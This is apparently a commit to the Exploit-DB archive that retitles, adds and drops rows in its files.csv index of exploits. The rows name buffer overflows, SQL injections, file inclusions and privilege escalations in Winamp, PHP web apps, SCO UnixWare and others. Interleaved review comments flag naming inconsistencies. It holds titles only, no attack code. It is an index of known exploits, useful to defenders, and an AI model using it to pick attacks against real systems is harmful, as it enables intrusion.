DB: 2016-11-18

3 new exploits

Winamp 5.21 - (Midi File Header Handling) Buffer Overflow (PoC)
Winamp 5.21 - .Midi File Header Handling Buffer Overflow (PoC)

Nullsoft Winamp 5.3 - (Ultravox-Max-Msg) Heap Overflow Denial of Service (PoC)
NullSoft Winamp 5.3 - (Ultravox-Max-Msg) Heap Overflow Denial of Service (PoC)

Apple Mac OSX 10.4.x Kernel -  i386_set_ldt() Integer Overflow (PoC)
Apple Mac OSX 10.4.x Kernel - i386_set_ldt() Integer Overflow (PoC)

Microsoft Visual InterDev 6.0 (SP6) - .SLN File Local Buffer Overflow (PoC)
Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow (PoC)

WinAmp GEN_MSN Plugin - Heap Buffer Overflow (PoC)
Winamp GEN_MSN Plugin - Heap Buffer Overflow (PoC)

Winamp 5.572 - whatsnew.txt Stack Overflow (PoC)
Winamp 5.572 - 'whatsnew.txt' Stack Overflow (PoC)

Nullsoft Winamp 5.0.x - Variant 'IN_CDDA.dll' Remote Buffer Overflow
NullSoft Winamp 5.0.x - Variant 'IN_CDDA.dll' Remote Buffer Overflow
WinAmp 5.63 - Invalid Pointer Dereference
WinAmp 5.63 - Stack Based Buffer Overflow
Winamp 5.63 - Invalid Pointer Dereference
Winamp 5.63 - Stack Based Buffer Overflow

Winamp 5.666 build 3516 - (Corrupted flv) Crash (PoC)
Winamp 5.666 build 3516 - Corrupted .flv Crash (PoC)

Microsoft Edge - 'eval' Type Confusion

Nullsoft Winamp 5.32 - .MP4 Tags Stack Overflow
NullSoft Winamp 5.32 - .MP4 Tags Stack Overflow
SCO UnixWare < 7.1.4 p534589 - (pkgadd) Privilege Escalation
SCO UnixWare Reliant HA - Privilege Escalation
SCO UnixWare Merge - mcd Privilege Escalation
Microsoft Visual Basic Enterprise 6 SP6 - '.DSR' File Local Buffer Overflow
SCO UnixWare < 7.1.4 p534589 - 'pkgadd' Privilege Escalation
SCO UnixWare Reliant HA 1.1.4 - Privilege Escalation
SCO UnixWare Merge - 'mcd' Privilege Escalation

Winamp 5.05-5.13 - '.ini' Local Stack Buffer Overflow (PoC)
Winamp 5.05<5.13 - '.ini' Local Stack Buffer Overflow (PoC)
Winamp 5.572 - whatsnew.txt Stack Overflow
Winamp 5.572 - whatsnew.txt Local Buffer Overflow (Windows XP SP3 DE)
Winamp 5.572 - 'whatsnew.txt' Stack Overflow
Winamp 5.572 (Windows XP SP3 DE) - 'whatsnew.txt' Local Buffer Overflow

Winamp 5.572 - whatsnew.txt SEH (Metasploit)
Winamp 5.572 - 'whatsnew.txt' SEH (Metasploit)

Winamp 5.572 - Local Buffer Overflow (Windows 7 ASLR + DEP Bypass)
Winamp 5.572 (Windows 7) - Local Buffer Overflow (ASLR + DEP Bypass)

Nullsoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking
NullSoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking

WinAmp 5.63 - (winamp.ini) Local Exploit
Winamp 5.63 - 'winamp.ini' Local Exploit

Nginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation
Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)
Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)
Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)
Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)

Nullsoft Winamp 2.x - AIP Buffer Overflow
NullSoft Winamp 2.x - AIP Buffer Overflow

Nullsoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow
NullSoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow

winamp Web interface 7.5.13 - Multiple Vulnerabilities
Winamp Web interface 7.5.13 - Multiple Vulnerabilities

Nullsoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow
NullSoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow

LinPHA 1.3.1 - (new_images.php) Blind SQL Injection
LinPHA 1.3.1 - 'new_images.php' Blind SQL Injection

KwsPHP Module jeuxflash 1.0 - 'id' SQL Injection
KwsPHP Module jeuxflash 1.0 - 'id' Parameter SQL Injection

KwsPHP 1.0 - Newsletter Module SQL Injection
KwsPHP 1.0 Module Newsletter - SQL Injection
DaZPHP 0.1 - (prefixdir) Local File Inclusion
PhpBlock a8.4 - (PATH_TO_CODE) Remote File Inclusion
KwsPHP Module Galerie - (id_gal) SQL Injection
KwsPHP Module Archives - 'id' SQL Injection
KwsPHP Module jeuxflash (cat) 1.0 - SQL Injection
KwsPHP Module ConcoursPhoto - (C_ID) SQL Injection
XPOZE Pro 3.05 - (reed) SQL Injection
Vastal I-Tech Software Zone - 'cat_id' SQL Injection
sabros.us 1.75 - (thumbnails.php) Remote File Disclosure
Comdev News Publisher - SQL Injection
Affiliate Directory - 'cat_id' SQL Injection
PHP Photo Gallery 1.0 - (photo_id) SQL Injection
Blogator-script 0.95 - (incl_page) Remote File Inclusion
PIGMy-SQL 1.4.1 - (getdata.php id) Blind SQL Injection
Blogator-script 0.95 - (id_art) SQL Injection
Dragoon 0.1 - (lng) Local File Inclusion
DaZPHP 0.1 - 'prefixdir' Parameter Local File Inclusion
PhpBlock a8.4 - 'PATH_TO_CODE' Parameter Remote File Inclusion
KwsPHP 1.3.456 Module Galerie - 'id_gal' Parameter SQL Injection
KwsPHP 1.3.456 Module Archives - 'id' Parameter SQL Injection
KwsPHP Module jeuxflash 1.0 - 'cat' Parameter SQL Injection
KwsPHP Module ConcoursPhoto 2.0 - 'C_ID' Parameter SQL Injection
XPOZE Pro 3.05 - 'reed' Parameter SQL Injection
Vastal I-Tech Software Zone - 'cat_id' Parameter SQL Injection
Sabros.us 1.75 - 'thumbnails.php' Remote File Disclosure
Comdev News Publisher 4.1.2 - SQL Injection
Affiliate Directory - 'cat_id' Parameter SQL Injection
PHP Photo Gallery 1.0 - 'photo_id' Parameter SQL Injection
Blogator-script 0.95 - 'incl_page' Parameter Remote File Inclusion
PIGMy-SQL 1.4.1 - 'getdata.php' Blind SQL Injection
Blogator-script 0.95 - 'id_art' Parameter SQL Injection
Dragoon 0.1 - 'lng' Parameter Local File Inclusion
Easynet Forum Host - 'forum.php forum' SQL Injection
CoBaLT 0.1 - Multiple SQL Injections
Gaming Directory 1.0 - 'cat_id' SQL Injection
Easynet Forum Host - 'forum.php' SQL Injection
Cobalt 0.1 - Multiple SQL Injections
Gaming Directory 1.0 - 'cat_id' Parameter SQL Injection
Links Directory 1.1 - 'cat_id' SQL Injection
Software Index 1.1 - 'cid' SQL Injection
Links Directory 1.1 - 'cat_id' Parameter SQL Injection
Software Index 1.1 - 'cid' Parameter SQL Injection
Blog PixelMotion - 'index.php categorie' SQL Injection
Site Sift Listings - 'id' SQL Injection
Blog PixelMotion - 'categorie' Parameter SQL Injection
Site Sift Listings - 'id' Parameter SQL Injection

Prozilla Forum Service - 'forum.php forum' SQL Injection
Prozilla Forum Service - 'forum' Parameter SQL Injection

Prozilla Freelancers - (project) SQL Injection
Prozilla Freelancers - 'project' Parameter SQL Injection
LinPHA 1.3.3 - (maps plugin) Remote Command Execution
Dragoon 0.1 - (root) Remote File Inclusion
LinPHA 1.3.3 Plugin Maps - Remote Command Execution
Dragoon 0.1 - 'root' Parameter Remote File Inclusion

k-links directory - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
k-links directory - SQL Injection / Cross-Site Scripting

SFS Affiliate Directory - 'id' SQL Injection
Affiliate Directory - 'id' Parameter SQL Injection

SFS EZ Gaming Directory - 'Directory.php id' SQL Injection
SFS EZ Gaming Directory - 'directory.php' SQL Injection

SFS EZ Gaming Directory - 'cat_id' SQL Injection
SFS EZ Gaming Directory - 'cat_id' Parameter SQL Injection

LinPHA 1.3.2 - (rotate.php) Remote Command Execution
LinPHA 1.3.2 - 'rotate.php' Remote Command Execution

cobalt qube webmail 1.0 - Directory Traversal
Cobalt Qube Webmail 1.0 - Directory Traversal
LinPHA 0.9.x/1.0 - 'index.php' lang Parameter Local File Inclusion
LinPHA 0.9.x/1.0 - install.php language Parameter Local File Inclusion
LinPHA 0.9.x/1.0 - sec_stage_install.php language Parameter Local File Inclusion
LinPHA 0.9.x/1.0 - forth_stage_install.php language Variable POST Method Local File Inclusion
LinPHA 0.9.x/1.0 - 'lang' Parameter Local File Inclusion
LinPHA 0.9.x/1.0 - 'install.php' Parameter Local File Inclusion
LinPHA 0.9.x/1.0 - 'sec_stage_install.php' Parameter Local File Inclusion
LinPHA 0.9.x/1.0 - 'forth_stage_install.php' Local File Inclusion

LinPHA 1.1 - Multiple Cross-Site Scripting Vulnerabilities

Drake CMS 0.2 - 'index.php' Cross-Site Scripting

Sabros.US 1.7 - 'index.php' Cross-Site Scripting

Drake CMS 0.3.7 - 404.php Local File Inclusion
Drake CMS 0.3.7 - '404.php' Local File Inclusion

Drake CMS 0.4.9 - 'index.php' Cross-Site Scripting

Blogator-script 0.95 - 'bs_auth.php' Cross-Site Scripting

CoBaLT 2.0 - 'adminler.asp' SQL Injection
Cobalt 2.0 - 'adminler.asp' SQL Injection

VisualPic 0.3.1 - Cross-Site Scripting
LinPHA 1.3.2/1.3.3 - 'login.php' Cross-Site Scripting
LinPHA 1.3.2/1.3.3 - new_images.php Cross-Site Scripting

Software Index - 'signinform.php' Cross-Site Scripting

CMSimple 4.4.4 - Remote file Inclusion
CMSimple 4.4.4 - Remote File Inclusion
Wordpress Plugin Answer My Question 1.3 - SQL Injection
Wordpress Plugin Sirv 1.3.1 - SQL Injection
Offensive Security 2016-11-18 05:01:22 +00:00
parent e1c4e9e1ec
commit b22e31535e
20 changed files with 187 additions and 1270 deletions

155
files.csv

@ -349,7 +349,7 @@ id,file,description,date,author,platform,type,port
1880,platforms/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - Netfilter NAT SNMP Module Remote Denial of Service",2006-06-05,"ECL Labs",linux,dos,0
1894,platforms/linux/dos/1894.py,"0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash (PoC)",2006-06-09,"Federico Fazzi",linux,dos,0
1927,platforms/windows/dos/1927.pl,"Microsoft Excel - Unicode Local Overflow (PoC)",2006-06-18,kingcope,windows,dos,0
1935,platforms/windows/dos/1935.cpp,"Winamp 5.21 - (Midi File Header Handling) Buffer Overflow (PoC)",2006-06-20,BassReFLeX,windows,dos,0
1935,platforms/windows/dos/1935.cpp,"Winamp 5.21 - .Midi File Header Handling Buffer Overflow (PoC)",2006-06-20,BassReFLeX,windows,dos,0
1937,platforms/multiple/dos/1937.html,"Opera 9 - (long href) Remote Denial of Service",2006-06-21,N9,multiple,dos,0
1947,platforms/multiple/dos/1947.c,"BitchX 1.1-final - do_hook() Remote Denial of Service",2006-06-24,"Federico L. Bossi Bonin",multiple,dos,0
1949,platforms/windows/dos/1949.pl,"XM Easy Personal FTP Server 5.0.1 - 'Port' Remote Overflow (PoC)",2006-06-24,"Jerome Athias",windows,dos,0
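Review bot: the new title for id 1935 leaves the extension unquoted and capitalised (.Midi), while the other rows retitled in this commit put the file name or extension in single quotes ('.sln' for 5349, '.ini' for 11139, 'whatsnew.txt' for 11248). Quote it the same way here so the description column follows one convention and a search on the quoted form also finds this row.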
@ -408,7 +408,7 @@ id,file,description,date,author,platform,type,port
2682,platforms/windows/dos/2682.pl,"Microsoft Windows - NAT Helper Components Remote Denial of Service (Perl)",2006-10-30,x82,windows,dos,0
2695,platforms/multiple/dos/2695.html,"Mozilla Firefox 1.5.0.7/2.0 - (createRange) Remote Denial of Service",2006-10-31,"Gotfault Security",multiple,dos,0
2700,platforms/hardware/dos/2700.rb,"Apple Airport - 802.11 Probe Response Kernel Memory Corruption PoC (Metasploit)",2006-11-01,"H D Moore",hardware,dos,0
2708,platforms/windows/dos/2708.c,"Nullsoft Winamp 5.3 - (Ultravox-Max-Msg) Heap Overflow Denial of Service (PoC)",2006-11-03,cocoruder,windows,dos,0
2708,platforms/windows/dos/2708.c,"NullSoft Winamp 5.3 - (Ultravox-Max-Msg) Heap Overflow Denial of Service (PoC)",2006-11-03,cocoruder,windows,dos,0
2715,platforms/windows/dos/2715.pl,"XM Easy Personal FTP Server 5.2.1 - Remote Denial of Service",2006-11-04,boecke,windows,dos,0
2716,platforms/windows/dos/2716.pl,"Essentia Web Server 2.15 - GET Request Remote Denial of Service",2006-11-04,CorryL,windows,dos,0
2730,platforms/linux/dos/2730.pm,"OpenLDAP 2.2.29 - Remote Denial of Service (Metasploit)",2006-11-06,"Evgeny Legerov",linux,dos,0
@ -656,7 +656,7 @@ id,file,description,date,author,platform,type,port
4610,platforms/windows/dos/4610.html,"Viewpoint Media Player for IE 3.2 - Remote Stack Overflow (PoC)",2007-11-06,shinnai,windows,dos,0
4613,platforms/windows/dos/4613.html,"Adobe Shockwave - ShockwaveVersion() Stack Overflow (PoC)",2007-11-08,Elazar,windows,dos,0
4615,platforms/multiple/dos/4615.txt,"MySQL 5.0.45 - (Alter) Denial of Service",2007-11-09,"Kristian Hermansen",multiple,dos,0
4624,platforms/osx/dos/4624.c,"Apple Mac OSX 10.4.x Kernel - i386_set_ldt() Integer Overflow (PoC)",2007-11-16,"RISE Security",osx,dos,0
4624,platforms/osx/dos/4624.c,"Apple Mac OSX 10.4.x Kernel - i386_set_ldt() Integer Overflow (PoC)",2007-11-16,"RISE Security",osx,dos,0
4648,platforms/multiple/dos/4648.py,"Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH)",2007-11-23,h07,multiple,dos,0
4682,platforms/windows/dos/4682.c,"Microsoft Windows Media Player - AIFF Divide By Zero Exception Denial of Service (PoC)",2007-11-29,"Gil-Dong / Woo-Chi",windows,dos,0
4683,platforms/windows/dos/4683.py,"RealPlayer 11 - '.au' Denial of Service",2007-12-01,NtWaK0,windows,dos,0
@ -717,7 +717,7 @@ id,file,description,date,author,platform,type,port
5341,platforms/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service",2008-04-01,Ray,windows,dos,0
5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service",2008-04-02,muts,windows,dos,0
5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP - Denial of Service",2008-04-02,muts,windows,dos,0
5349,platforms/windows/dos/5349.py,"Microsoft Visual InterDev 6.0 (SP6) - .SLN File Local Buffer Overflow (PoC)",2008-04-03,shinnai,windows,dos,0
5349,platforms/windows/dos/5349.py,"Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow (PoC)",2008-04-03,shinnai,windows,dos,0
5354,platforms/windows/dos/5354.c,"Xitami Web Server 2.5c2 - LRWP Processing Format String (PoC)",2008-04-03,bratax,windows,dos,0
5396,platforms/windows/dos/5396.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - Multiple Vulnerabilities",2008-04-07,"Luigi Auriemma",windows,dos,0
5427,platforms/windows/dos/5427.pl,"Borland Interbase 2007 - ibserver.exe Buffer Overflow (PoC)",2008-04-11,"Liu Zhen Hua",windows,dos,0
@ -899,7 +899,7 @@ id,file,description,date,author,platform,type,port
7685,platforms/multiple/dos/7685.pl,"SeaMonkey 1.1.14 - (marquee) Denial of Service",2009-01-06,StAkeR,multiple,dos,0
7693,platforms/windows/dos/7693.pl,"Perception LiteServe 2.0.1 - (user) Remote Buffer Overflow (PoC)",2009-01-07,Houssamix,windows,dos,0
7694,platforms/windows/dos/7694.py,"Audacity 1.6.2 - '.aup' Remote Off-by-One Crash",2009-01-07,Stack,windows,dos,0
7696,platforms/windows/dos/7696.pl,"WinAmp GEN_MSN Plugin - Heap Buffer Overflow (PoC)",2009-01-07,SkD,windows,dos,0
7696,platforms/windows/dos/7696.pl,"Winamp GEN_MSN Plugin - Heap Buffer Overflow (PoC)",2009-01-07,SkD,windows,dos,0
7708,platforms/windows/dos/7708.pl,"MP3 TrackMaker 1.5 - '.mp3' Local Heap Overflow (PoC)",2009-01-09,Houssamix,windows,dos,0
7709,platforms/windows/dos/7709.pl,"VUPlayer 2.49 - '.asx' (HREF) Local Buffer Overflow (PoC)",2009-01-09,"aBo MoHaMeD",windows,dos,0
7710,platforms/windows/dos/7710.html,"Microsoft Internet Explorer - JavaScript screen[ ] Denial of Service",2009-01-09,Skylined,windows,dos,0
@ -1357,7 +1357,7 @@ id,file,description,date,author,platform,type,port
11234,platforms/windows/dos/11234.py,"Sonique2 2.0 Beta Build 103 - Local Crash (PoC)",2010-01-23,b0telh0,windows,dos,0
11245,platforms/windows/dos/11245.txt,"Mozilla Firefox 3.6 - (XML parser) Memory Corruption PoC/Denial of Service",2010-01-24,d3b4g,windows,dos,0
11247,platforms/windows/dos/11247.txt,"Opera 10.10 - (XML parser) Denial of Service (PoC)",2010-01-24,d3b4g,windows,dos,0
11248,platforms/windows/dos/11248.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow (PoC)",2010-01-24,Debug,windows,dos,0
11248,platforms/windows/dos/11248.pl,"Winamp 5.572 - 'whatsnew.txt' Stack Overflow (PoC)",2010-01-24,Debug,windows,dos,0
11254,platforms/windows/dos/11254.pl,"P2GChinchilla HTTP Server 1.1.1 - Denial of Service",2010-01-24,"Zer0 Thunder",windows,dos,0
11260,platforms/windows/dos/11260.txt,"AIC Audio Player 1.4.1.587 - Local Crash (PoC)",2010-01-26,b0telh0,windows,dos,0
11265,platforms/windows/dos/11265.pl,"KOL WaveIOX 1.04 - '.wav' Local Buffer Overflow (PoC)",2010-01-26,cr4wl3r,windows,dos,0
@ -3305,7 +3305,7 @@ id,file,description,date,author,platform,type,port
25046,platforms/linux/dos/25046.c,"Snort 2.1/2.2 - DecodeTCPOptions Remote Denial of Service (1)",2004-12-22,"Marcin Zgorecki",linux,dos,0
25047,platforms/linux/dos/25047.c,"Snort 2.1/2.2 - DecodeTCPOptions Remote Denial of Service (2)",2004-12-22,Antimatt3r,linux,dos,0
25056,platforms/multiple/dos/25056.html,"Netscape Navigator 7.2 - Infinite Array Sort Denial of Service",2005-01-21,"Berend-Jan Wever",multiple,dos,0
25061,platforms/windows/dos/25061.txt,"Nullsoft Winamp 5.0.x - Variant 'IN_CDDA.dll' Remote Buffer Overflow",2005-01-25,"Yu Yang",windows,dos,0
25061,platforms/windows/dos/25061.txt,"NullSoft Winamp 5.0.x - Variant 'IN_CDDA.dll' Remote Buffer Overflow",2005-01-25,"Yu Yang",windows,dos,0
25063,platforms/windows/dos/25063.pl,"War FTP Daemon 1.8 - Remote Denial of Service",2005-01-27,MC.Iglo,windows,dos,0
25070,platforms/linux/dos/25070.c,"ngIRCd 0.6/0.7/0.8 - Remote Buffer Overflow",2005-01-28,"Florian Westphal",linux,dos,0
25075,platforms/multiple/dos/25075.pl,"Eternal Lines Web Server 1.0 - Remote Denial of Service",2005-02-01,"Ziv Kamir",multiple,dos,0
@ -3433,8 +3433,8 @@ id,file,description,date,author,platform,type,port
26526,platforms/windows/dos/26526.py,"VideoLAN VLC Media Player 2.0.7 - '.png' Crash (PoC)",2013-07-01,"Kevin Fujimoto",windows,dos,0
26548,platforms/hardware/dos/26548.pl,"Cisco PIX - TCP SYN Packet Denial of Service",2005-11-22,"Janis Vizulis",hardware,dos,0
26555,platforms/windows/dos/26555.txt,"Opera 12.15 - vtable Corruption",2013-07-02,echo,windows,dos,0
26557,platforms/windows/dos/26557.txt,"WinAmp 5.63 - Invalid Pointer Dereference",2013-07-02,"Julien Ahrens",windows,dos,0
26558,platforms/windows/dos/26558.txt,"WinAmp 5.63 - Stack Based Buffer Overflow",2013-07-02,"Julien Ahrens",windows,dos,0
26557,platforms/windows/dos/26557.txt,"Winamp 5.63 - Invalid Pointer Dereference",2013-07-02,"Julien Ahrens",windows,dos,0
26558,platforms/windows/dos/26558.txt,"Winamp 5.63 - Stack Based Buffer Overflow",2013-07-02,"Julien Ahrens",windows,dos,0
26575,platforms/windows/dos/26575.txt,"MailEnable 1.1/1.7 - IMAP Rename Request Remote Denial of Service",2005-11-23,"Josh Zlatin-Amishav",windows,dos,0
26578,platforms/windows/dos/26578.py,"Realtek Sound Manager AvRack - '.wav' Crash (PoC)",2013-07-03,Asesino04,windows,dos,0
26601,platforms/linux/dos/26601.pl,"Unalz 0.x - Archive Filename Buffer Overflow",2005-11-28,"Ulf Harnhammar",linux,dos,0
@ -4439,7 +4439,7 @@ id,file,description,date,author,platform,type,port
35804,platforms/windows/dos/35804.txt,"NetVault: SmartDisk 1.2 - 'libnvbasics.dll' Remote Denial of Service",2011-05-28,"Luigi Auriemma",windows,dos,0
35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x - KSM Local Denial of Service",2011-06-02,"Andrea Righi",linux,dos,0
35827,platforms/windows/dos/35827.py,"JetAudio 8.1.3 - '.mp4' Crash (PoC)",2014-12-12,"Drozdova Liudmila",windows,dos,0
35828,platforms/windows/dos/35828.py,"Winamp 5.666 build 3516 - (Corrupted flv) Crash (PoC)",2014-12-12,"Drozdova Liudmila",windows,dos,0
35828,platforms/windows/dos/35828.py,"Winamp 5.666 build 3516 - Corrupted .flv Crash (PoC)",2014-12-12,"Drozdova Liudmila",windows,dos,0
35842,platforms/windows/dos/35842.c,"Malwarebytes Anti-Exploit 1.03.1.1220/1.04.1.1012 - Out-of-Bounds Read Denial of Service",2015-01-20,"Parvez Anwar",windows,dos,0
35849,platforms/osx/dos/35849.c,"Apple Mac OSX 10.10 - IOKit IntelAccelerator Null Pointer Dereference",2015-01-20,"Google Security Research",osx,dos,0
35856,platforms/multiple/dos/35856.html,"Opera Web Browser 11.11 - Denial of Service",2011-06-14,echo,multiple,dos,0
@ -5264,6 +5264,7 @@ id,file,description,date,author,platform,type,port
40761,platforms/windows/dos/40761.html,"Microsoft Edge 11.0.10240.16384 - 'edgehtml' CAttr­Array::Destroy Use-After-Free",2016-11-15,Skylined,windows,dos,0
40762,platforms/linux/dos/40762.c,"Linux Kernel (Ubuntu / RedHat) - 'keyctl' Null Pointer Dereference",2016-11-15,"OpenSource Security",linux,dos,0
40766,platforms/windows/dos/40766.txt,"Microsoft Windows Kernel - Registry Hive Loading 'nt!RtlEqualSid' Out-of-Bounds Read (MS16-138)",2016-11-15,"Google Security Research",windows,dos,0
40773,platforms/windows/dos/40773.html,"Microsoft Edge - 'eval' Type Confusion",2016-11-17,"Google Security Research",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -5787,7 +5788,7 @@ id,file,description,date,author,platform,type,port
4698,platforms/linux/local/4698.c,"Send ICMP Nasty Garbage (sing) - Append File Logrotate Exploit",2007-12-06,bannedit,linux,local,0
4701,platforms/windows/local/4701.pl,"Media Player Classic 6.4.9 - '.MP4' File Stack Overflow",2007-12-08,"SYS 49152",windows,local,0
4702,platforms/windows/local/4702.pl,"Microsoft Windows Media Player 6.4 - '.MP4' File Stack Overflow (PoC)",2007-12-08,"SYS 49152",windows,local,0
4703,platforms/windows/local/4703.pl,"Nullsoft Winamp 5.32 - .MP4 Tags Stack Overflow",2007-12-08,"SYS 49152",windows,local,0
4703,platforms/windows/local/4703.pl,"NullSoft Winamp 5.32 - .MP4 Tags Stack Overflow",2007-12-08,"SYS 49152",windows,local,0
4749,platforms/windows/local/4749.c,"Rosoft Media Player 4.1.7 - '.m3u' Stack Overflow",2007-12-18,devcode,windows,local,0
4751,platforms/windows/local/4751.pl,"jetAudio 7.0.5 COWON Media Center MP4 - Stack Overflow",2007-12-18,"SYS 49152",windows,local,0
4756,platforms/linux/local/4756.c,"Linux Kernel < 2.6.11.5 - BlueTooth Stack Privilege Escalation",2007-12-18,Backdoored,linux,local,0
@ -5814,10 +5815,9 @@ id,file,description,date,author,platform,type,port
5287,platforms/windows/local/5287.txt,"Microsoft Excel - Code Execution (MS08-014)",2008-03-21,zha0,windows,local,0
5320,platforms/windows/local/5320.txt,"Microsoft Office XP SP3 - '.PPT' File Buffer Overflow (MS08-016)",2008-03-30,Marsu,windows,local,0
5346,platforms/windows/local/5346.pl,"XnView 1.92.1 - (FontName) Slideshow Buffer Overflow",2008-04-02,haluznik,windows,local,0
5355,platforms/sco/local/5355.sh,"SCO UnixWare < 7.1.4 p534589 - (pkgadd) Privilege Escalation",2008-04-04,qaaz,sco,local,0
5356,platforms/sco/local/5356.c,"SCO UnixWare Reliant HA - Privilege Escalation",2008-04-04,qaaz,sco,local,0
5357,platforms/sco/local/5357.c,"SCO UnixWare Merge - mcd Privilege Escalation",2008-04-04,qaaz,sco,local,0
5361,platforms/windows/local/5361.py,"Microsoft Visual Basic Enterprise 6 SP6 - '.DSR' File Local Buffer Overflow",2008-04-04,shinnai,windows,local,0
5355,platforms/sco/local/5355.sh,"SCO UnixWare < 7.1.4 p534589 - 'pkgadd' Privilege Escalation",2008-04-04,qaaz,sco,local,0
5356,platforms/sco/local/5356.c,"SCO UnixWare Reliant HA 1.1.4 - Privilege Escalation",2008-04-04,qaaz,sco,local,0
5357,platforms/sco/local/5357.c,"SCO UnixWare Merge - 'mcd' Privilege Escalation",2008-04-04,qaaz,sco,local,0
5424,platforms/linux/local/5424.txt,"AlsaPlayer < 0.99.80-rc3 - Vorbis Input Local Buffer Overflow",2008-04-10,"Albert Sellares",linux,local,0
5442,platforms/windows/local/5442.cpp,"Microsoft Windows - GDI Image Parsing Stack Overflow (MS08-021)",2008-04-14,Lamhtz,windows,local,0
5462,platforms/windows/local/5462.py,"DivX Player 6.6.0 - '.srt' File Buffer Overflow (SEH)",2008-04-18,muts,windows,local,0
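Review bot: the row for id 5361 (Microsoft Visual Basic Enterprise 6 SP6 - '.DSR' File Local Buffer Overflow) is dropped in this hunk with no replacement, which is why the header goes from 10 lines to 9, while the three SCO UnixWare rows beside it are only retitled. The commit message lists the 5361 title among the old SCO titles without saying the entry is being removed. Please confirm that platforms/windows/local/5361.py is deleted in the same commit, or that the row is re-added elsewhere in files.csv, so the index and the tree do not drift apart.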
@ -6264,7 +6264,7 @@ id,file,description,date,author,platform,type,port
11093,platforms/windows/local/11093.rb,"Soritong 1.0 - Universal Buffer Overflow SEH (Metasploit)",2010-01-10,fb1h2s,windows,local,0
11109,platforms/windows/local/11109.rb,"Audiotran 1.4.1 - '.pls' Stack Overflow (Metasploit)",2010-01-11,dookie,windows,local,0
11112,platforms/windows/local/11112.c,"HTMLDOC 1.9.x-r1629 (Windows x86) - Local .html Buffer Overflow",2010-01-11,"fl0 fl0w",windows,local,0
11139,platforms/windows/local/11139.c,"Winamp 5.05-5.13 - '.ini' Local Stack Buffer Overflow (PoC)",2010-01-14,"fl0 fl0w",windows,local,0
11139,platforms/windows/local/11139.c,"Winamp 5.05<5.13 - '.ini' Local Stack Buffer Overflow (PoC)",2010-01-14,"fl0 fl0w",windows,local,0
11146,platforms/windows/local/11146.py,"BS.Player 2.51 - Overwrite (SEH)",2010-01-15,"Mert SARICA",windows,local,0
11152,platforms/windows/local/11152.py,"Google SketchUp 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,windows,local,0
11154,platforms/windows/local/11154.py,"BS.Player 2.51 - Universal SEH Overflow",2010-01-16,Dz_attacker,windows,local,0
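Review bot: the new title for id 11139 replaces the range "5.05-5.13" with "5.05<5.13", which is ambiguous. Elsewhere in this file "<" is written with spaces and means "versions before" (for example "SCO UnixWare < 7.1.4 p534589"), so a reader or a version-matching script cannot tell whether 5.05 and 5.13 are both affected or what the bounds are. Suggest keeping the hyphenated range, or writing "5.05 < 5.13" with spaces if that is the intended house style for ranges.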
@ -6279,8 +6279,8 @@ id,file,description,date,author,platform,type,port
11219,platforms/windows/local/11219.pl,"SOMPL Player 1.0 - Buffer Overflow",2010-01-22,Rick2600,windows,local,0
11229,platforms/windows/local/11229.txt,"Microsoft Internet Explorer - wshom.ocx (Run) ActiveX Remote Code Execution (Add Admin)",2010-01-22,Stack,windows,local,0
11232,platforms/windows/local/11232.c,"Authentium SafeCentral 2.6 - 'shdrv.sys' Local Kernel Ring0 SYSTEM Exploit",2010-01-22,mu-b,windows,local,0
11255,platforms/windows/local/11255.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow",2010-01-25,Dz_attacker,windows,local,0
11256,platforms/windows/local/11256.pl,"Winamp 5.572 - whatsnew.txt Local Buffer Overflow (Windows XP SP3 DE)",2010-01-25,NeoCortex,windows,local,0
11255,platforms/windows/local/11255.pl,"Winamp 5.572 - 'whatsnew.txt' Stack Overflow",2010-01-25,Dz_attacker,windows,local,0
11256,platforms/windows/local/11256.pl,"Winamp 5.572 (Windows XP SP3 DE) - 'whatsnew.txt' Local Buffer Overflow",2010-01-25,NeoCortex,windows,local,0
11264,platforms/windows/local/11264.rb,"South River Technologies WebDrive Service 9.02 build 2232 - Bad Security Descriptor Privilege Escalation",2010-01-26,Trancer,windows,local,0
11267,platforms/windows/local/11267.py,"Winamp 5.572 - SEH Exploit",2010-01-26,TecR0c,windows,local,0
11281,platforms/windows/local/11281.c,"Rising AntiVirus 2008/2009/2010 - Privilege Escalation",2010-01-28,Dlrow,windows,local,0
@ -6343,7 +6343,7 @@ id,file,description,date,author,platform,type,port
